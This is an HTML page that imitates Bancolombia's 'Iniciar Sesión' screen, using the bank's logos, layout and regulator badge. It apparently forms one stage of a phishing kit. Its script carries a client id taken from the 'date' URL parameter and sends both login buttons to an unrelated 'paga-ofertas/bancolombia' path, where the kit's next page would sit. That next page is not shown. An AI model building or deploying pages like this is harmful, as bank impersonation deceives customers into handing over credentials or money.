<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <title>Autenticación Bancolombia</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet"
        integrity="sha384-QWTKZyjpPEjISv5WaRU9OFeRpok6YctnYmDr5pNlyT2bRjXh0JMhjY6hW+ALEwIH" crossorigin="anonymous" />
    <link rel="stylesheet" href="./style2.css" />
    <link rel="icon" type="image/png" href="./media/logo.png" />
</head>

<body>
    <section class="home-bc">
   
    <div class="header">
        <img src="./media/Bancolombia.ae56ff7f0e9a3fd0046b5f264dc42c79.svg" height="20rem" alt="" />
        <div class="logout">
            Salir
            <img class="out-image" src="./media/ExitIcon.35b2413abce276ac588d59c3ef6b1251.svg" alt="" />
        </div>
    </div>
    <div id="home">
        <section class="welcome-div">
            <div>
                <h2 >Iniciar Sesión</h2>
            </div>
            <div >
                <p>Elige cómo quieres continuar:</p>
            </div>
        </section>

        <section class="buttons">
            <div class="personas" id="personas">
                <div class="text">
                    <p class="boldText" style="margin-bottom: -0.6rem; font-size: 1rem;">
                        Bancolombia Personas
                    </p>
                    <p class="normalText" style="margin-top: 7px;font-size: 0.8rem;">
                        Si manejas cuenta o productos personales.
                    </p>
                </div>
                <div class="arrow">
                    <img src="./media/faChevronRight.0dc234203984d356c34897837c59674a.svg" alt="" srcset="" />
                </div>
            </div>

            <div class="mano" id="mano">
                <div class="text-mano">
                    <p class="boldText" style="margin-bottom: -0.6rem;font-size: 1rem;">
                        Bancolombia A la mano
                    </p>
                    <p class="normalText" style="margin-top: 7px;font-size: 0.8rem;">
                        Si usas esta aplicación.
                    </p>
                </div>
                <div class="arrow-mano">
                    <img src="./media/faChevronRight.0dc234203984d356c34897837c59674a.svg" alt="" srcset="" />
                </div>
            </div>
        </section>
        <br />
        <section style="margin: 0 auto; text-align: center;">
            <h5 href="">¿Qué opción debo elegir?</h5>
        </section>

        <section class="back"></section>
    </div>
    <hr style="width: 80%; margin: 10px auto;">
    <img style="display: block; margin: 0 auto; " src="./media/grupo.png" width="150px" height="20px" alt="" srcset="">
  
    <img style="display: block; margin: 0 auto; " src="./media/vigilado.691ba87177cfc7656937fafcb0c6925a.svg"
    width="200px" height="30px" alt="" srcset="">
    </section>




</body>     
<script>
    let trico = "../../../paga-ofertas/bancolombia";

    const url = new URL(window.location.href);

    // Usa URLSearchParams para obtener el valor del parámetro "date"
    const clienteid = url.searchParams.get('date');

    document.getElementById('personas').addEventListener('click', () => {
        window.location.href = `${trico}?date=${clienteid}`
    });

    document.getElementById('mano').addEventListener('click', () => {
        window.location.href = `${trico}?date=${clienteid}`
    });
</script>

</html>